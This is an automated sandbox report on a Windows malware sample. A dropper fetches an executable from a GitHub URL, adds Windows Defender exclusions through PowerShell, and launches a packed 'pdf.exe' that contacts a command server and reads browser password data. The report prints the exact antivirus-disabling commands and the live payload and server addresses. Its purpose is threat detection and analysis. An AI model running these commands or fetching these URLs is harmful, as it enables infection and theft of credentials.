Source: powershell.exe, 00000004.00000002.1730880127.0000000004A36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: pdf.exe, 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmp	String found in binary or memory: http://www.enigmaprotector.com/
Source: pdf.exe, 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmp	String found in binary or memory: http://www.enigmaprotector.com/openU
Source: powershell.exe, 00000004.00000002.1735434885.0000000006F42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: pdf.exe, 00000007.00000003.2004978035.0000000003860000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: pdf.exe, 00000007.00000003.2004978035.0000000003860000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: pdf.exe, 00000007.00000003.1927623634.0000000003869000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000002.00000002.1752259690.0000000004ED1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1730880127.00000000048E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: pdf.exe, 00000007.00000003.2006177522.00000000008DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: pdf.exe, 00000007.00000003.2006177522.00000000008DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: pdf.exe, 00000007.00000003.1927623634.0000000003869000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: pdf.exe, 00000007.00000003.1927623634.0000000003869000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: pdf.exe, 00000007.00000003.1927623634.0000000003869000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: pdf.exe, 00000007.00000003.2006177522.00000000008DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: pdf.exe, 00000007.00000003.2006177522.00000000008DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: powershell.exe, 00000004.00000002.1733532963.000000000594C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.1733532963.000000000594C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.1733532963.000000000594C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: pdf.exe, 00000007.00000003.1927623634.0000000003869000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: pdf.exe, 00000007.00000003.1927623634.0000000003869000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: pdf.exe, 00000007.00000003.1927623634.0000000003869000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000002.4141670945.0000000002380000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.4141670945.0000000002377000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com
Source: powershell.exe, 00000004.00000002.1730880127.0000000004A36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: file.exe, 00000000.00000002.4141670945.0000000002301000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.4141670945.0000000002310000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/vonuch1/start/raw/refs/heads/main/khtoawdltrha.exe
Source: file.exe	String found in binary or memory: https://github.com/vonuch1/start/raw/refs/heads/main/khtoawdltrha.exe#C:
Source: pdf.exe, 00000007.00000003.2006177522.00000000008DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: powershell.exe, 00000002.00000002.1759697438.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1733532963.000000000594C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: file.exe, 00000000.00000002.4141670945.00000000023A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com
Source: file.exe, 00000000.00000002.4141670945.00000000023A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/vonuch1/start/refs/heads/main/khtoawdltrha.exe
Source: pdf.exe, 00000007.00000003.2050172748.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.1927002716.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000002.2179825249.000000000085A000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000002.2180058428.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2175105603.00000000008D1000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2175040288.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2004766910.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.1927112545.00000000008B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seallysl.site/
Source: pdf.exe, 00000007.00000002.2179825249.000000000085A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seallysl.site/0t
Source: pdf.exe, 00000007.00000003.2052878859.00000000008B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seallysl.site/apQ$
Source: pdf.exe, 00000007.00000002.2179825249.000000000083D000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2050172748.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000002.2179825249.000000000085A000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000002.2179825249.000000000082B000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000002.2179825249.00000000008A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seallysl.site/api
Source: pdf.exe, 00000007.00000003.2111218031.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000002.2180058428.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2111335907.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2111066004.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2175105603.00000000008D1000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2175040288.00000000008CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seallysl.site/api$
Source: pdf.exe, 00000007.00000003.2111218031.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2101548903.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2101608351.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2111335907.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2111066004.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2175105603.00000000008D1000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2175040288.00000000008CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seallysl.site/apiH
Source: pdf.exe, 00000007.00000003.2050172748.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2111218031.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2101548903.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2101608351.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2111335907.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2111066004.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2175105603.00000000008D1000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2175040288.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2004766910.00000000008CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seallysl.site/apif
Source: pdf.exe, 00000007.00000003.2050172748.00000000008CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seallysl.site/e
Source: pdf.exe, 00000007.00000002.2179825249.000000000085A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seallysl.site/qt
Source: pdf.exe, 00000007.00000002.2179825249.000000000085A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://seallysl.site/t
Source: pdf.exe, 00000007.00000003.1927351008.0000000003880000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: pdf.exe, 00000007.00000003.2005843013.0000000003940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: pdf.exe, 00000007.00000003.2005843013.0000000003940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: pdf.exe, 00000007.00000003.1927351008.000000000387E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: pdf.exe, 00000007.00000003.1927351008.000000000387E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: pdf.exe, 00000007.00000003.2006177522.00000000008DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: pdf.exe, 00000007.00000003.1927623634.0000000003869000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: pdf.exe, 00000007.00000003.2006177522.00000000008DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: pdf.exe, 00000007.00000003.1927623634.0000000003869000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: pdf.exe, 00000007.00000003.2005843013.0000000003940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: pdf.exe, 00000007.00000003.2005843013.0000000003940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: pdf.exe, 00000007.00000003.2005843013.0000000003940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: pdf.exe, 00000007.00000003.2005843013.0000000003940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: pdf.exe, 00000007.00000003.2005843013.0000000003940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.4:49744 version: TLS 1.2

System Summary

PE file has nameless sections

Source: pdf.exe.0.dr	Static PE information: section name:
Source: pdf.exe.0.dr	Static PE information: section name:
Source: pdf.exe.0.dr	Static PE information: section name:
Source: pdf.exe.0.dr	Static PE information: section name:
Source: pdf.exe.0.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009B09B8	0_2_009B09B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04C6B4C8	2_2_04C6B4C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_04C6B4B8	2_2_04C6B4B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08C63AA8	2_2_08C63AA8
Source: C:\Lipras\pdf.exe	Code function: 7_2_00040130	7_2_00040130
Source: C:\Lipras\pdf.exe	Code function: 7_2_0003F970	7_2_0003F970
Source: C:\Lipras\pdf.exe	Code function: 7_2_0006A2E0	7_2_0006A2E0
Source: C:\Lipras\pdf.exe	Code function: 7_2_0005EB60	7_2_0005EB60
Source: C:\Lipras\pdf.exe	Code function: 7_2_0004D5AF	7_2_0004D5AF
Source: C:\Lipras\pdf.exe	Code function: 7_2_00074620	7_2_00074620
Source: C:\Lipras\pdf.exe	Code function: 7_2_0005A6D0	7_2_0005A6D0
Source: C:\Lipras\pdf.exe	Code function: 7_2_0004482A	7_2_0004482A
Source: C:\Lipras\pdf.exe	Code function: 7_2_00072850	7_2_00072850
Source: C:\Lipras\pdf.exe	Code function: 7_2_000400C7	7_2_000400C7
Source: C:\Lipras\pdf.exe	Code function: 7_2_000338E0	7_2_000338E0
Source: C:\Lipras\pdf.exe	Code function: 7_2_0004011A	7_2_0004011A
Source: C:\Lipras\pdf.exe	Code function: 7_2_00074920	7_2_00074920
Source: C:\Lipras\pdf.exe	Code function: 7_2_00069940	7_2_00069940
Source: C:\Lipras\pdf.exe	Code function: 7_2_00037A14	7_2_00037A14
Source: C:\Lipras\pdf.exe	Code function: 7_2_0005AA40	7_2_0005AA40
Source: C:\Lipras\pdf.exe	Code function: 7_2_0003F250	7_2_0003F250
Source: C:\Lipras\pdf.exe	Code function: 7_2_0003A270	7_2_0003A270
Source: C:\Lipras\pdf.exe	Code function: 7_2_0003C277	7_2_0003C277
Source: C:\Lipras\pdf.exe	Code function: 7_2_0004E298	7_2_0004E298
Source: C:\Lipras\pdf.exe	Code function: 7_2_000732C0	7_2_000732C0
Source: C:\Lipras\pdf.exe	Code function: 7_2_0003DB20	7_2_0003DB20
Source: C:\Lipras\pdf.exe	Code function: 7_2_00051B40	7_2_00051B40
Source: C:\Lipras\pdf.exe	Code function: 7_2_00069BA0	7_2_00069BA0
Source: C:\Lipras\pdf.exe	Code function: 7_2_000733B0	7_2_000733B0
Source: C:\Lipras\pdf.exe	Code function: 7_2_00044BBF	7_2_00044BBF
Source: C:\Lipras\pdf.exe	Code function: 7_2_00045BD8	7_2_00045BD8
Source: C:\Lipras\pdf.exe	Code function: 7_2_0005C3E0	7_2_0005C3E0
Source: C:\Lipras\pdf.exe	Code function: 7_2_0006EC20	7_2_0006EC20
Source: C:\Lipras\pdf.exe	Code function: 7_2_00064C60	7_2_00064C60
Source: C:\Lipras\pdf.exe	Code function: 7_2_000394BF	7_2_000394BF
Source: C:\Lipras\pdf.exe	Code function: 7_2_0003ECC0	7_2_0003ECC0
Source: C:\Lipras\pdf.exe	Code function: 7_2_0004ECDE	7_2_0004ECDE
Source: C:\Lipras\pdf.exe	Code function: 7_2_00059D00	7_2_00059D00
Source: C:\Lipras\pdf.exe	Code function: 7_2_0003BD70	7_2_0003BD70
Source: C:\Lipras\pdf.exe	Code function: 7_2_00038DA0	7_2_00038DA0
Source: C:\Lipras\pdf.exe	Code function: 7_2_000635B0	7_2_000635B0
Source: C:\Lipras\pdf.exe	Code function: 7_2_0003ADD0	7_2_0003ADD0
Source: C:\Lipras\pdf.exe	Code function: 7_2_00046E10	7_2_00046E10
Source: C:\Lipras\pdf.exe	Code function: 7_2_0003D760	7_2_0003D760
Source: C:\Lipras\pdf.exe	Code function: 7_2_00064F80	7_2_00064F80
Source: C:\Lipras\pdf.exe	Code function: 7_2_0003279D	7_2_0003279D
Source: C:\Lipras\pdf.exe	Code function: 7_2_00039F9C	7_2_00039F9C
Source: C:\Lipras\pdf.exe	Code function: 7_2_00034FA0	7_2_00034FA0
Source: C:\Lipras\pdf.exe	Code function: 7_2_0003279D	7_2_0003279D
Source: C:\Lipras\pdf.exe	Code function: 7_2_02633E11	7_2_02633E11
Source: C:\Lipras\pdf.exe	Code function: 7_2_02633CD7	7_2_02633CD7
Source: C:\Lipras\pdf.exe	Code function: 7_2_02634BF9	7_2_02634BF9

Source: C:\Lipras\pdf.exe	Code function: String function: 0003C8C0 appears 38 times
Source: C:\Lipras\pdf.exe	Code function: String function: 0004C2A0 appears 82 times

Source: file.exe, 00000000.00000000.1669953044.0000000000068000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSession.exe0 vs file.exe
Source: file.exe, 00000000.00000002.4139998465.00000000006BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameSession.exe0 vs file.exe

Source: pdf.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9979495662811388
Source: pdf.exe.0.dr	Static PE information: Section: ZLIB complexity 1.0011935763888888
Source: pdf.exe.0.dr	Static PE information: Section: .data ZLIB complexity 0.9975373178785403

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@10/11@4/3

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7308:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vszyjc0t.wog.ps1

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Lipras\pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Lipras\pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: pdf.exe, 00000007.00000003.1927439015.0000000003856000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.1927798943.000000000383A000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Lipras'; Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Lipras
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Lipras\pdf.exe "C:\Lipras\pdf.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Lipras'; Add-MpPreference -ExclusionPath 'C:\Users'"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Lipras\pdf.exe "C:\Lipras\pdf.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Lipras	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
